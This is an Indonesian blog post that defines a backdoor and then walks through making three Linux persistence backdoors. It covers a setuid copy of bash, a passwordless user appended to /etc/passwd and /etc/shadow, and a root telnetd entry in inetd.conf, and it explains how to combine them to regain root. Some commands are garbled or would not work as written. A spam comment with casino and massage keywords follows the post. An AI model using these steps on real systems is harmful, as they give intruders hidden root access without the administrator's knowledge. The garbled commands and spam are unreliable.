yudi

Backdoor

Merupakan jalan belakang untuk menghindari password untuk login. Jalan belakang ini dimungkinkan karena aplikasi atau rootkit yang jalan dikomputer tersebut. Sehingga Backdoor merupakan suatu istilah yang seringkali digunakan untuk masuk ke dalam sistem tanpa sepengetahuan administrator, namun hal tersebut bisa dilakukan jika penyusup pernah masuk kedalam sistem tersebut dengan hak akses root. Pemberian backdoor dilakukan untuk mempermudah mereka memasuki sistem tersebut jika jalan yang telah dibuat dengan eksploit telah ditutup oleh administrator. Sehingga tujuan dari backdoor bukan untuk mendapatkan previlege root, tetapi untuk mendapatkan kembali previlege yang pernah diperoleh. Contoh sederhana dari backdoor adalah mengganti user id dengan user id root yaitu 0.

• Cara Membuat backdoor :
Tujuan utama dari backdoor adalah agar kita mempunyai jalan belakang menuju sasaran yang tentu saja tidak atau susah diketahui oleh sang pemilik. Berikut langkah-langkah membuat Backdoor adalah :

Local Backdoor
cd /bin
cp bash load
chgrp root load
chmod +s load
Type load in console to get root access

User Backdoor ( Tanpa Password )
echo test::512:512:4:/:/bin/bash >> /etc/passwd
echo test::11092:0:99999:7:-1:-1:134537332 >>
> /etc/shadow
Contoh:
Red Hat Linux release 6.0 Publisher's Edition
> (Hedwig)
Kernel 2.2.5-15smp on an i686
login: Escuver
[test@xes /]$

Port Backdoor
echo stream tcp nowait root
> /usr/sbin/in.telnetd
in.telnetd >> /etc/inetd.conf
/etc/rc.d/init.d/inet restart

Ketiga Backdoor ini dapat digunakan bersama. Pertama, telnet ke server menggunakan port backdoor, kemudian masukan backdoored login (username) Terakhir ketik Load.

Related Posts by Categories



1 komentar:

udonachman mengatakan...

Casino Night at Harrah's Casino Atlantic City - Mapyro
Information 서울특별 출장안마 and Reviews about Casino 서산 출장안마 Night at Harrah's Casino Atlantic City in Atlantic City, including Realtime Reviews, Photos, Reviews 전라남도 출장샵 and Map 원주 출장안마 of the 공주 출장마사지

Kirimkan Komentar Anda

Template by : kendhin x-template.blogspot.com